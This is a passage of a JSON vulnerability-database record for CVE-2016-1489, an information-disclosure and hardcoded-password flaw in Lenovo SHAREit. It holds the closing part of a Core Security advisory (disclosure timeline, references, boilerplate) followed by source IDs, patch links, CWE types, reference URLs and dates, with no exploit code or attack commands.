Security informed Lenovo that they would be publishing both versions on Friday 22 of January. \n2016-01-20: Core Security requested Lenovo to release the updates on Monday 25 of January as it was recommended before in order to give the affected users enough working days to download and install the new version. \n2016-01-21: Lenovo informed Core Security that they agreed to release on Monday, January 25. They also informed that they would be publishing their security advisory as well. \n2016-01-25: Advisory CORE-2016-0002 published. \n9. References\n\n[1] http://shareit.lenovo.com/#DOWNLOAD. \n[2] http://www.lenovo.com. \n\n10. About CoreLabs\n\nCoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. \n\n11. About Core Security Technologies\n\nCore Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. \n\nCore Security\u0027s software solutions build on over a decade of trusted research and leading-edge threat expertise from the company\u0027s Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. \n\n12. Disclaimer\n\nThe contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n13. PGP/GPG Keys\n\nThis advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-1489"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001336"
},
{
"db": "BID",
"id": "81748"
},
{
"db": "VULHUB",
"id": "VHN-90308"
},
{
"db": "VULMON",
"id": "CVE-2016-1489"
},
{
"db": "PACKETSTORM",
"id": "135378"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-1489",
"trust": 3.0
},
{
"db": "PACKETSTORM",
"id": "135378",
"trust": 1.3
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001336",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201601-635",
"trust": 0.7
},
{
"db": "BID",
"id": "81748",
"trust": 0.4
},
{
"db": "VULHUB",
"id": "VHN-90308",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2016-1489",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-90308"
},
{
"db": "VULMON",
"id": "CVE-2016-1489"
},
{
"db": "BID",
"id": "81748"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001336"
},
{
"db": "PACKETSTORM",
"id": "135378"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-635"
},
{
"db": "NVD",
"id": "CVE-2016-1489"
}
]
},
"id": "VAR-201601-0460",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-90308"
}
],
"trust": 0.01
},
"last_update_date": "2024-02-06T22:43:07.572000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "LEN-4058",
"trust": 0.8,
"url": "https://support.lenovo.com/jp/ja/product_security/len_4058"
},
{
"title": "Lenovo SHAREit Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=59950"
},
{
"title": "The Register",
"trust": 0.2,
"url": "https://www.theregister.co.uk/2016/01/27/worlds_worst_passwords_hardcoded_into_lenovo_shareit/"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-1489"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001336"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-635"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-200",
"trust": 1.9
},
{
"problemtype": "CWE-254",
"trust": 1.1
},
{
"problemtype": "CWE-Other",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-90308"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001336"
},
{
"db": "NVD",
"id": "CVE-2016-1489"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.0,
"url": "http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities"
},
{
"trust": 1.8,
"url": "https://support.lenovo.com/us/en/product_security/len_4058"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2016/jan/67"
},
{
"trust": 1.2,
"url": "http://www.securityfocus.com/archive/1/537365/100/0/threaded"
},
{
"trust": 1.2,
"url": "http://packetstormsecurity.com/files/135378/lenovo-shareit-information-disclosure-hardcoded-password.html"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1489"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-1489"
},
{
"trust": 0.3,
"url": "http://www.lenovo.com/ca/en/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/200.html"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/254.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.theregister.co.uk/2016/01/27/worlds_worst_passwords_hardcoded_into_lenovo_shareit/"
},
{
"trust": 0.1,
"url": "https://www.securityfocus.com/bid/81748"
},
{
"trust": 0.1,
"url": "http://shareit.lenovo.com/#download."
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1489"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1492"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1490"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1491"
},
{
"trust": 0.1,
"url": "http://www.lenovo.com."
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-90308"
},
{
"db": "VULMON",
"id": "CVE-2016-1489"
},
{
"db": "BID",
"id": "81748"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001336"
},
{
"db": "PACKETSTORM",
"id": "135378"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-635"
},
{
"db": "NVD",
"id": "CVE-2016-1489"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-90308"
},
{
"db": "VULMON",
"id": "CVE-2016-1489"
},
{
"db": "BID",
"id": "81748"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001336"
},
{
"db": "PACKETSTORM",
"id": "135378"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-635"
},
{
"db": "NVD",
"id": "CVE-2016-1489"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-01-26T00:00:00",
"db": "VULHUB",
"id": "VHN-90308"
},
{
"date": "2016-01-26T00:00:00",
"db": "VULMON",
"id": "CVE-2016-1489"
},
{
"date": "2016-01-25T00:00:00",
"db": "BID",
"id": "81748"
},
{
"date": "2016-01-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001336"
},
{
"date": "2016-01-25T20:02:22",
"db": "PACKETSTORM",
"id": "135378"
},
{
"date": "2016-01-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201601-635"
},
{
"date": "2016-01-26T19:59:04.407000",
"db": "NVD",
"id": "CVE-2016-1489"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-90308"
},
{
"date": "2018-10-09T00:00:00",
"db": "VULMON",
"id": "CVE-2016-1489"
},
{
"date": "2016-01-25T00:00:00",
"db": "BID",
"id": "81748"
},
{
"date": "2016-01-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001336"
},
{
"date": "2016-01-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201601-635"
},
{
"date": "2018-10-09T19:59:07.537000",
"db": "NVD",
"id": "CVE-2016-1489"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "specific network environment",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201601-635"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Windows and Android Edition Lenovo SHAREit Vulnerability in which important information is obtained",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001336"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201601-635"
}
],
"trust": 0.6
}
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.